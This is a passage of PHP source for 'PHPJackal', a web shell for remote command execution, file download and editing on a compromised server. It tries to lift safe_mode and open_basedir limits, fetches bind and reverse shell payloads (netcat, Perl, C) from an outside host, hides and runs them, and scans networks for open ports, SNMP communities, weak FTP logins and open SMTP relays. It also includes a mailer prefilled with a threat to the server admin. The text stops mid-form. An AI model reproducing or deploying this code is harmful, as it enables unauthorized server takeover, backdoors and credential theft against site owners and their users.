<?php #--Config--# $login_password= ''; //Set password #----------# error_reporting(E_ALL); set_time_limit(0); ini_set("max_execution_time","0"); ini_set("memory_limit","9999M"); set_magic_quotes_runtime(0); if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS; if(!isset($_POST))$_POST = &$HTTP_POST_VARS; if(!isset($_GET))$_GET = &$HTTP_GET_VARS; if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS; $_REQUEST = array_merge($_GET, $_POST); if (get_magic_quotes_gpc()){ foreach ($_REQUEST as $key=>$value) { $_REQUEST[$key]=stripslashes($value); } } function hlinK($str=""){ $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF']."?"; $new=explode("&",$str); foreach ($_GET as $key => $v){ $add=1; foreach($new as $m){ $el = explode("=", $m); if ($el[0]==$key)$add=0; } if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; } $ret.=$str; return $ret; } if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); @header("Location: ".hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>"); } if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=@fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=@fsockopen("udp://".$ip,$port); if($scan){ socket_set_timeout($scan,$timeout); @fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if (!function_exists("file_get_contents")){ function file_get_contents($addr){ $a = fopen($addr,"r"); $tmp = fread($a,filesize($a)); fclose($a); if($a)return $tmp; } } if (!function_exists("file_put_contents")){ function file_put_contents($addr,$con){ $a = fopen($addr,"w"); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } } function flusheR(){ flush();@ob_flush(); } if (!empty($_REQUEST['downloaD'])){ @ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header("Content-type: application/octet-stream"); header("Content-disposition: attachment; filename=\"$dl\";"); header("Content-length: ".strlen($con)); echo $con; exit; } if (!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header("Content-type: imagE/gif"); header("Content-length: ".filesize($img)); header("Last-Modified: ".date("r",filemtime($img))); echo file_get_contents($img); exit; } @header("Cache-Control: no-cache, must-revalidate"); @header("Expires: Mon, 7 Aug 1987 05:00:00 GMT"); function showsizE($size){ if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size; } if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; $errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>"; $et = "</td></tr></table>"; $v="1.5"; $msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">"; $intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>"; $footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et"; $hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">"; $t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">"; $crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; function namE(){ $name=''; srand((double)microtime()*100000); for ($i=0;$i<=rand(3,10);$i++){ $name.=chr(rand(97,122)); } return $name; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return "."; } function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; } function downloadiT($get,$put){ $fo=@strtolower(ini_get('allow_url_fopen')); if($fo || $fo=='on')$con=file_get_contents($get); else{ $u=parse_url($get); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $url=fsockopen($host, 80, $en, $es, 12); fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function smtplogiN($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.namE()."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function checksmtP($host,$timeout){ $from=strtolower(namE())."@".strtolower(namE()).".com"; $sock=@fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.namE()."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function check_urL($url,$method,$search,$timeout){ if(empty($search))$search='200'; $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} while(!feof($sock)){ $res=trim(fgets($sock)); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=namE().namE(); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). $com. chr(0xA0). chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). chr(0x01). chr(0x01). $n. chr(0x05). $n; $sock=@fsockopen("udp://$ip",161); socket_set_timeout($sock,$timeout); @fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); return $res; } $safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} $disablefunctions = @ini_get('disable_functions'); if (!function_exists("str_repeat")){ function str_repeat($str,$c){ $r=""; for($i=0; $i < $cu; $i++)$r.=$str; return $r; } } function brshelL(){ global $errorbox, $windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/backdoor'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=namE(); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; $c=($_REQUEST['C'])?1:0; if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.=".exe"; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winbind.pl",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl.exe $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.pl",$name); if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winrc.pl",$name); shelL("attrib +H $name"); if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.pl",$name); if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); } } echo "<font color=blue>Done!</font>";} else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}} function showimagE($img){ echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";} function editoR($file){ global $errorbox,$et,$hcwd; if (is_file($file)){ if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";} if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} $data = file_get_contents($file); echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">"; echo htmlspecialchars($data); echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; } else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; } echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>"; } function webshelL(){ global $windows,$hcwd; if($windows){ $alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>"; } else{ $alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>"; if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>"; if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>"; } echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">"; if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>"; } function maileR(){ global $msgbox,$et,$hcwd; $cwd= getcwd(); if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; if (!mail($to,$subject,$body,"From: $from"))break; echo "$msgbox<b>Mail sent!</b><br>$et"; } echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et"; } function scanneR(){ global $hcwd; if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>"; $start=time(); for($i=$from;$i<=$to;$i++){ if($tcp){ if (checkthisporT($target,$i,$timeout)){ $nu++; $ser=""; if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>"; } } if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";} flusheR(); } $time=time()-$start; echo "Done! ($time seconds)</font>"; } elseif (!empty($_REQUEST['securityscanner'])){ echo "<font color=blue>"; $start=time(); $from=$_REQUEST['from']; $to=(int)$_REQUEST['to']; $timeout=(int)$_REQUEST['timeout']; $f = substr($from,strrpos($from,".")+1); $from = substr($from,0,strrpos($from,".")); if(!empty($_REQUEST['httpscanner'])){ echo "Loading webserver bug list..."; flusheR(); $buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>"; flusheR(); }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";} for($i=$f;$i<=$to;$i++){ $output=0; $ip="$from.$i"; if(!empty($_REQUEST['nslookup'])){ $hn=gethostbyaddr($ip); if($hn!=$ip)echo "$ip [$hn]<br>";} flusheR(); if(!empty($_REQUEST['ipscanner'])){ $port=$_REQUEST['port']; if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; $open=$ser=""; foreach($p as $po){ $scan=checkthisporT($ip,$po,$timeout); if ($scan){ $ser=""; if($ser=getservbyport($po,"tcp"))$ser="($ser)"; $open.=" $po$ser "; } } if($open){echo "$ip) Open ports:$open<br>";$output=1;} flusheR(); } if(!empty($_REQUEST['httpbanner'])){ $res=get_sw_namE($ip,$timeout); if($res){ echo "$ip) Webserver software: "; if($res==-1)echo "Unknow"; else echo $res; echo "<br>"; $output=1; } flusheR(); } if(!empty($_REQUEST['httpscanner'])){ if(checkthisporT($ip,80,$timeout) && !empty($file)){ $admin=array('/admin/','/adm/'); $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); foreach ($file as $v){ $vuln=array(); $v=trim($v); if(!$v || $v{0}=='#')continue; $v=str_replace('","','^',$v); $v=str_replace('"','',$v); $vuln=explode('^',$v); $page=$cqich=$nukech=$adminch=$userch=$vuln[1]; if(strstr($page,'@CGIDIRS')) foreach($cgi as $cg){ $cqich=str_replace('@CGIDIRS',$cg,$page); $url="http://$ip$cqich"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } elseif(strstr($page,'@ADMINDIRS')) foreach ($admin as $cg){ $adminch=str_replace('@ADMINDIRS',$cg,$page); $url="http://$ip$adminch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } elseif(strstr($page,'@USERS')) foreach ($users as $cg){ $userch=str_replace('@USERS',$cg,$page); $url="http://$ip$userch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } elseif(strstr($page,'@NUKE')) foreach ($nuke as $cg){ $nukech=str_replace('@NUKE',$cg,$page); $url="http://$ip$nukech"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } else{ $url="http://$ip$page"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } } } } if(!empty($_REQUEST['smtprelay'])){ if(checkthisporT($ip,25,$timeout)){ $res=''; $res=checksmtP($ip,$timeout); if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR(); } } if(!empty($_REQUEST['snmpscanner'])){ if(checkthisporT($ip,161,$timeout,1)){ $com=$_REQUEST['com']; $coms=$res=""; if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; foreach ($c as $v){ $ret=snmpchecK($ip,$v,$timeout); if($ret)$coms .=" $v "; } if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} flusheR(); } } if(!empty($_REQUEST['ftpscanner'])){ if(checkthisporT($ip,21,$timeout)){ $usps=explode(',',$_REQUEST['userpass']); foreach ($usps as $v){ $user=substr($v,0,strpos($v,':')); $pass=substr($v,strpos($v,':')+1); if($pass=='[BLANK]')$pass=''; $ftp=@ftp_connect($ip,21,$timeout); if ($ftp){ if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";} } flusheR(); } } } if($output)echo "<hr size=1 noshade>"; flusheR(); } $time=time()-$start; echo "Done! ($time seconds)</font>"; if(!empty($buglist))unlink($buglist); } else{ $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input 